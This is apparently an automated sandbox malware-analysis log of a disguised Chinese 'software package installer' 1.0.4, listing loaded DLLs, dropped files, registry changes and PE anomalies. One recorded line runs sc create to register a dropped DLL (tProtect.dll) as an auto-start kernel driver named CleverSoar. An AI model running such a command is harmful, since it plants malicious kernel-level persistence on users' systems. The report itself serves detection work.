Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeStatic file information: File size 5694753 > 1048576
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1892309126.0000000003110000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1892434905.0000000003310000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_002057D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,9_2_002057D0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeStatic PE information: real checksum: 0x0 should be: 0x56ef0c
Source: update.vac.1.drStatic PE information: real checksum: 0x0 should be: 0x376862
Source: updat4.vac.6.drStatic PE information: real checksum: 0x0 should be: 0x376862
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.drStatic PE information: real checksum: 0x0 should be: 0x34399d
Source: update.vac.6.drStatic PE information: real checksum: 0x0 should be: 0x376862
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x34399d
Source: tProtect.dll.12.drStatic PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeStatic PE information: section name: .didata
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.drStatic PE information: section name: .didata
Source: update.vac.1.drStatic PE information: section name: .00cfg
Source: update.vac.1.drStatic PE information: section name: .voltbl
Source: update.vac.1.drStatic PE information: section name: .j)q
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.drStatic PE information: section name: .didata
Source: 7zr.exe.6.drStatic PE information: section name: .sxdata
Source: update.vac.6.drStatic PE information: section name: .00cfg
Source: update.vac.6.drStatic PE information: section name: .voltbl
Source: update.vac.6.drStatic PE information: section name: .j)q
Source: is-0C2B4.tmp.6.drStatic PE information: section name: .xdata
Source: updat4.vac.6.drStatic PE information: section name: .00cfg
Source: updat4.vac.6.drStatic PE information: section name: .voltbl
Source: updat4.vac.6.drStatic PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA1750B push ecx; ret 6_2_6CA1751E
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C8C0F00 push ss; retn 0001h6_2_6C8C0F0A
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA499F4 push 004AC35Ch; ret 6_2_6CA49A0E
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CAE5290 push eax; ret 6_2_6CAE52BE
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_001845F4 push 0022C35Ch; ret 9_2_0018460E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0021FB10 push eax; ret 9_2_0021FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0021FE90 push eax; ret 9_2_0021FEBE
Source: update.vac.1.drStatic PE information: section name: .j)q entropy: 7.186767136264165
Source: update.vac.6.drStatic PE information: section name: .j)q entropy: 7.186767136264165
Source: updat4.vac.6.drStatic PE information: section name: .j)q entropy: 7.186767136264165
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\is-0C2B4.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SND3J.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-C426E.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeFile created: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-C426E.tmp\update.vacJump to dropped file
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeFile created: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SND3J.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\updat4.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SND3J.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Users\user\AppData\Local\Temp\is-C426E.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile created: C:\Program Files (x86)\Windows NT\updat4.vacJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
